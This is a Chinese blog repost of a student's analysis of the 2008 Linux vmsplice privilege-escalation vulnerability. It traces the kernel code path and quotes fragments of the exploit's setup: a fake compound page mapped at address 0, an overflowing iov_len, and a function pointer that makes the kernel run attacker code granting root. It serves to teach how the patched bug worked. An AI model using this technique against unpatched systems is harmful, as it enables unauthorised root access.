linux使普通用户获得root权限的vmsplice系统调用漏洞分析

来源：互联网发布：java数据分析语言编辑：程序博客网时间：2024/05/29 16:30

转自：http://www.nhs8.com/tech/2276.html

vmsplice系统调用是linux内核2.6.17第一次引入的，随后被发现存在能让普通用户提升到root权限的漏洞。该漏洞影响的版本网络上笼统的说法是：2.6.17-2.6.24.1，实际上更确切的说是：2.6.17- 2.6.22.17，2.6.23-2.6.23.15 和 2.6.24-2.6.24.1.

关于这个漏洞，国内很少有人写过什么原创性的文章进行介绍，因为上研究生操作系统课的课程报告就是做这个，所以把它放上来。漏洞虽然已经补上，但学习其机理，还是比较有好处，有意思的。

一、预备知识

1. 本文的一些约定

这个颜色的代码来自攻击程序

这个颜色的代码来自内核

这个颜色表示重要的地方，或者安装程序逻辑，下一步要进入的函数

所提到的攻击代码是本文附带的exp.c

2. vmsplice()介绍

原型：long vmsplice(int fd, const struct iovec *iov, unsigned long nr_segs, unsigned int flags);

其中：

struct iovec

{

void __user *iov_base;

__kernel_size_t iov_len;

};

这个系统调用将用户空间的内存映射到内核空间，从而避免了实际的内存写操作，提高了系统效率。这个功能的是主要是通过fs/splice.c的 do_vmsplice()来实现。

3. 有关Page的常量

#define PAGE_SHIFT 12

#define PAGE_SIZE (1UL << PAGE_SHIFT)

/*1UL：32位的unsigned int 1，左移12位，PAGE_SIZE=0×1000*/

#define PAGE_MASK (~(PAGE_SIZE-1))

/*PAGE_MASK=0×000*/

二、Splice系统调用漏洞考古

2006 Jun 18

在发布的Linux kernel 2.6.17中引入vmsplice()，用于提高性能。

没有人知道，对应的fs/splice.c中的get_iovec_page_array()函数存在漏洞。

2007 Oct 09

在发布的Linux kernel 2.6.23 中

加入了vmsplice_to_user()函数和copy_from_user_mmap_sem()函数,也存在同样的漏洞。

2007 Dec 03

ID为CVE-2008-0009和CVE-2008-0010的漏洞报告被提交到CVE。

分别指出vmsplice_to_user()和copy_from_user_mmap_sem()存在这个漏洞。

但这两份报告有个错误：这两个漏洞存在于2.6.23-2.6.24而不是报告里说的2.6.22-2.6.24,因为这两个函数是在2.6.23里正式被加进来的。

2008 Feb 05

ID为CVE-2008-0600的漏洞报告被提交到CVE

指出:

The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.

事实上，问题出在get_iovec_page_array()函数。但因为get_iovec_page_array()函数只被 vmsplice_to_pipe()调用，数据参数都来自vmsplice_to_pipe()，所以，get_iovec_page_array() 没有验证用户数据的合法性也可以被认为vmsplice_to_pipe()没有验证用户数据的合法性。

2008 Feb 08

在发布的Linux kernel 2.6.24.1和2.6.23.15补丁中补上了CVE-2008-0009和CVE-2008-0010提到这个这两个漏洞。

2008 Feb 09

ID为qaaz的Geek在milw0rm上公布了两个对应的POC代码，第一个是针对vmsplice_to_user()函数和 copy_from_user_mmap_sem()函数的，另外一个是针对get_iovec_page_array()函数，

2008 Feb 11

在发布的Linux kernel 2.6.24.2 、2.6.23.16和 2.6.22.18补丁中补上了get_iovec_page_array()函数的漏洞。

三、漏洞攻击效果

无图

四、漏洞攻击真实案例

This bug is being actively exploited in the wild — our server was just broken in to by an attacker using it. (They got a user’s password by previously compromising a machine somewhere else where that user had an account, and installed a modified ssh binary on it to record user names and passwords. Then they logged in to our site as that user, exploited CVE-2008-0010, and became root).

五、the vmsplice() exploit story

1. 整个过程可以概括为下图：

Online view: http://share.xmind.net/shidelai/vmsplice-loopholes-in-the-success-of-the-attack-1/

2. 攻击程序做了如下六件事情

1)定义 kernel_code()

这个函数会修改当前用户的udi和gid，所有者一切的目的就是让内核执行这个函数。

2)定义了pages[5]，其中：

proc_pages[0]->flags = 1 << PG_compound;

proc_pages[0]->private = (unsigned long) proc_pages[0];

proc_pages[0]->count = 1;

这是为了把这个proc_page伪装成compound page，保证内核执行到/mm/Swap.c的

void put_page(struct page *page)

{

if (unlikely(PageCompound(page)))

put_compound_page(page);

else if (put_page_testzero(page))

__page_cache_release(page);

}

时候，内核进入put_compound_page(page);

proc_pages[1]->lru.next = (long) kernel_code;

内核执行到/mm/Swap.c的

static void put_compound_page(struct page *page)

{

….

dtor = get_compound_page_dtor(page);

(*dtor)(page);

}

的时候，get_compound_page_dtor会返回proc_pages[1]->lru.next。这样，kernel_code()就被内核执行了。

3)将proc_pages[0] mmap到0×0 address

到时候内核被骗执行0地址第二个page的lru.next指向的函数时候，实际上执行的就是这里定义的 proc_pages[1]->lru.next所指向的kernel_code()。

4)close(pi[0]); close pipe_read，当内核执行到/fs/Splice.c的splice_to_pipe()

for (;;) {

if (!pipe->readers) {

send_sig(SIGPIPE, current, 0);

if (!ret)

ret = -EPIPE;

break;

}

…

}

…

while (page_nr < spd_pages)

page_cache_release(spd->pages[page_nr++]);

时候，if判断会返回真，于是跳出for循环，于是导致 page_cache_release(spd->pages[page_nr++]);被执行。

5)iov.iov_len = ULONG_MAX;

iov.iov_len等于32个1。这个是关键，它保证了内核中数值溢出，结果将内核骗到攻击程序设定的page上来。

6)_vmsplice(pi[1], &iov, 1, 0);

执行vmsplice系统调用。

3. 内核代码执行细节

1)执行_vmsplice(pi[1], &iov, 1, 0);后，/fs/Splice.c中的

long sys_vmsplice(int fd, const struct iovec __user *iov, unsigned long nr_segs, unsigned int flags)

{

…

if (file->f_mode & FMODE_WRITE)//往管道写

error = vmsplice_to_pipe(file, iov, nr_segs, flags);

…

}

被调用。

2)接着内核进入/fs/Splice.c中的

static long vmsplice_to_pipe(struct file *file, const struct iovec __user *iov,

unsigned long nr_segs, unsigned int flags)

{

struct pipe_inode_info *pipe;

struct page *pages[PIPE_BUFFERS]; //请注意这里

struct partial_page partial[PIPE_BUFFERS]; //#define PIPE_BUFFERS (16) //请注意这里

struct splice_pipe_desc spd = {//请注意这里

.pages = pages,

.partial = partial,

.flags = flags,

.ops = &user_page_pipe_buf_ops,

};

…

spd.nr_pages = get_iovec_page_array(iov, nr_segs, pages, partial,

flags & SPLICE_F_GIFT);

…

return splice_to_pipe(pipe, &spd);

}

3)接着内核进入/fs/Splice.c中的

static int get_iovec_page_array(const struct iovec __user *iov,

unsigned int nr_vecs, struct page **pages,

struct partial_page *partial, int aligned)

{

&helli
p;…

if (copy_from_user_mmap_sem(&entry, iov, sizeof(entry))) //entry = iov

break;

base = entry.iov_base;//内核缓冲区基地址

len = entry.iov_len;//长度

……

npages = (off + len + PAGE_SIZE – 1) >> PAGE_SHIFT;

// npages = （0+ 32个1 + 1后面12个0 – 1 ）>> PAGE_SHIFT = （32个1 + 1 -1 + 1后面12个0 – 1）>> PAGE_SHIFT =0

if (npages > PIPE_BUFFERS – buffers)

npages = PIPE_BUFFERS – buffers;

error = get_user_pages(current, current->mm,

(unsigned long) base, npages, 0, 0,

&pages[buffers], NULL);

……

}

4) 于是内核进入/mm/Memory.c中的

int get_user_pages(struct task_struct *tsk, struct mm_struct *mm,

unsigned long start, int len, int write, int force,

struct page **pages, struct vm_area_struct **vmas)

{

……

do {

……

i++;

start += PAGE_SIZE;

len–;

continue;

}

do {

……

i++;

start += PAGE_SIZE;

len–;

} while (len && start < vma->vm_end);

} while (len);

return i;

}

len这里已经是int型了，而不是ulong int，len从0被减到-32768(0xf0000000)再减1变成+32767(0×7fffffff)，最终返回i=46。

5) 然后i返回给/fs/Splice.c中的

static int get_iovec_page_array(const struct iovec __user *iov,

unsigned int nr_vecs, struct page **pages,

struct partial_page *partial, int aligned)

{

……

error = get_user_pages(current, current->mm,

(unsigned long) base, npages, 0, 0,

&pages[buffers], NULL);

//error = 46

……

for (i = 0; i < error; i++) {

const int plen = min_t(size_t, len, PAGE_SIZE – off);

partial[buffers].offset = off;

partial[buffers].len = plen;

off = 0;

len -= plen;

buffers++;

}

……

}

在这个for循环中，partial[]数组大小是16，而循环确循环了46次，所以，溢出了。比partial先定义的pages[]指针数组被 0覆盖。

6) 接着，函数返回到/fs/Splice.c的

static long vmsplice_to_pipe(struct file *file, const struct iovec __user *iov,

unsigned long nr_segs, unsigned int flags)

{

……

spd.nr_pages = get_iovec_page_array(iov, nr_segs, pages, partial,

flags & SPLICE_F_GIFT);

……

return splice_to_pipe(pipe, &spd);

}

7) 进入/fs/Splice.c的

ssize_t splice_to_pipe(struct pipe_inode_info *pipe,

struct splice_pipe_desc *spd)

{

……

for (;;) {

if (!pipe->readers) {

send_sig(SIGPIPE, current, 0);

if (!ret)

ret = -EPIPE;

break;

}

…….

}

……

while (page_nr < spd_pages)

page_cache_release(spd->pages[page_nr++]);

return ret;

}

因为之前提到的pipe的读已经被关掉了，所以从for循环跳出。内核执行进入 page_cache_release(spd->pages[page_nr++]);

请注意：这里的spd->pages就是之前被溢出被0覆盖的pages[]指针数组。

8)由于

#define page_cache_release(page) put_page(page)

9) 于是进入了/mm/Swap.c中的

void put_page(struct page *page)

{

if (unlikely(PageCompound(page)))

put_compound_page(page);

else if (put_page_testzero(page))

__page_cache_release(page);

}

由于之前提到的，攻击程序已经将其已经被mmap到0地址空间的proc_pages[]伪装成compound page，所以，这里if判断后

10)内核进入同在/mm/Swap.c 的

static void put_compound_page(struct page *page)

{

page = compound_head(page);

if (put_page_testzero(page)) {

compound_page_dtor *dtor;

dtor = get_compound_page_dtor(page);

(*dtor)(page);

}

11)再进入/include/linux/Mm.h中的

static inline compound_page_dtor *get_compound_page_dtor(struct page *page)

{

return (compound_page_dtor *)page[1].lru.next;

}

OK，到此，proc_pages[1].lru.next所指向的函数指针也即kernel_code()函数指针返回给dtor，随后 (*dtor)(page);执行了这个函数，于是，攻击成功。